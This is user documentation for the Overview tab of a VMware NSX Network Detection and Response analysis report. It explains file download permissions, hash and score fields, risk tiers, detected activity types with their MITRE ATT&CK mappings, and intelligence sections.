Analysis report: Overview tab

The Overview tab displays the following information:

Click file download to download the detected file to your local machine. From the pull-down menu. select Download file or Download as ZIP.

If you select Download as ZIP, the Download file as a zip pop-up is displayed, prompting you to provide an optional password for the archive.

Important:

The VMware NSX Network Detection and Response only allows you to download detected files under certain conditions.

If the artifact is considered low risk, file download is displayed and you can download it to your local machine.

If the artifact is considered risky, file download is not displayed unless your license has the ALLOW_RISKY_ARTIFACT_DOWNLOADS capability.

You must be aware that the artifact can possibly cause harm when opened.

The User Portal may display a pop-up: Warning: Downloading Malicious File. Click the I agree button to accept the conditions and download the file.

For malicious artifacts. you may want to encapsulate the file in a zip archive to prevent other solutions that are monitoring your traffic from automatically inspecting the threat.

If you do not have the ALLOW_RISKY_ARTIFACT_DOWNLOADS capability and require the ability to download malicious artifacts, contact VMware Support.

Click plus / minus to expand/collapse the sections on the tab.

Analysis overview section

If the VMware backend encountered errors during analysis, a highlighted block is displayed. It contains a list of the errors encountered.

The Analysis overview section provides a summary of the results of the analysis of a file or URL by the VMware backend. It displays the following data:

  • MD5 hash. Click search to search for other instances of this artifact in your network. Click Intelligence pages icon to view the artifact in Intelligence pages.

  • SHA1 hash. Click Intelligence pages icon to view the artifact in Intelligence pages.

  • SHA256 hash. Click Intelligence pages icon to view the artifact in Intelligence pages.

  • MIME type.

  • Submission timestamp.

Threat level section

The Threat level section starts with a summary of the analysis findings: "The file md5 hash was found to be malicious/benign".

It then displays the following data:

Risk assessment

This section displays the risk assessment findings.

  • Maliciousness score Sets a score out of 100.

  • Risk estimate An estimate of the risk posed by this artifact:

    • High This artifact represents a critical risk and must be addressed in priority. Such subjects are typically Trojan files or documents containing exploits, leading to major compromises of the infected system. The risks are multiple: from information leakage to the system dysfunction. These risks can be partially inferred from the Type of activity detected. The score threshold for this category is usually above 70.

    • Medium This artifact can represent a long-term risk and needs to be monitored closely. Such subjects can be a web page containing suspicious content, potentially leading to drive-by attempts. They can also be adware or fake antivirus products that do not pose an immediate serious threat but can cause issues with the functioning of the system. The score threshold for this category is usually from 30 to 70.

    • Low This artifact is considered benign and can be ignored. The score threshold for this category is usually below 30.

  • Antivirus class Click search to search for other instances of this class. Click Intelligence pages icon to view this class in Intelligence pages.

  • Antivirus family Click search to search for other instances of this family. Click Intelligence pages icon to view this family in Intelligence pages.

Analysis overview

The analysis overview list is sorted by severity and includes the following fields:

  • Severity This is a score between 0 and 100 of the maliciousness of the activities detected during analysis of the artifact. Additional icons indicate the operating systems that can run the artifact.

  • Type The types of activities detected during analysis of the artifact. These include:

    • Autostart Ability to restart after a machine shutdown.

    • Disable Ability to disable critical components of the system.

    • Evasion Ability to evade analysis environment.

    • File Suspicious activity over the file system.

    • Memory Suspicious activity within the system memory.

    • Network Suspicious activity at the network level.

    • Reputation Known source or signed by reputable organization.

    • Settings Ability to permanently alter critical system settings.

    • Signature Malicious subject identification.

    • Steal Ability to access and potentially leak sensitive information.

    • Stealth Ability to remain unnoticed by users.

    • Silenced Benign subject identification.

  • Description A description corresponding to each type of activity detected during analysis of the artifact.

  • ATT&CK Tactic(s) The MITRE ATT&CK stage or stages of an attack. Multiple tactics are comma separated.

  • ATT&CK Technique(s) The observed actions or tools a malicious actor might utilize. Multiple techniques are comma separated.

  • Links Click search to search for other instances of this activity. Click Intelligence pages icon to view this activity in Intelligence pages.

Additional artifacts

This section lists additional artifacts (files and URLs) that were observed during the analysis of the submitted sample and that were in turn submitted for in-depth analysis. The includes the following fields:

  • Description Describes the additional artifact.

  • SHA1 The SHA1 hash of the additional artifact.

  • Content type The MIME type of the additional artifact.

  • Score The maliciousness score of the additional artifact. Click link to view the associated analysis report.

Decoded command line arguments

If any PowerShell scripts were executed during the analysis, the system decodes these scripts, making its arguments available in a more human-readable form.

Third-party tools

A link to a report on the artifact on VirusTotal.

Intelligence information

The Intelligence information section extracts relevant data from the Knowledge Base and provides further details about the sample.

Important:

This section does not appear if you do not have a Knowledge Base license.

Some of this information is useful to determine if a given threat has been seen broadly at other VMware customers or if it targets specific market sectors. Other information displays the timeline of occurrences when the sample was observed at other VMware customer sites. This information can help you understand if the sample belongs to a well-known threat or represents a new threat.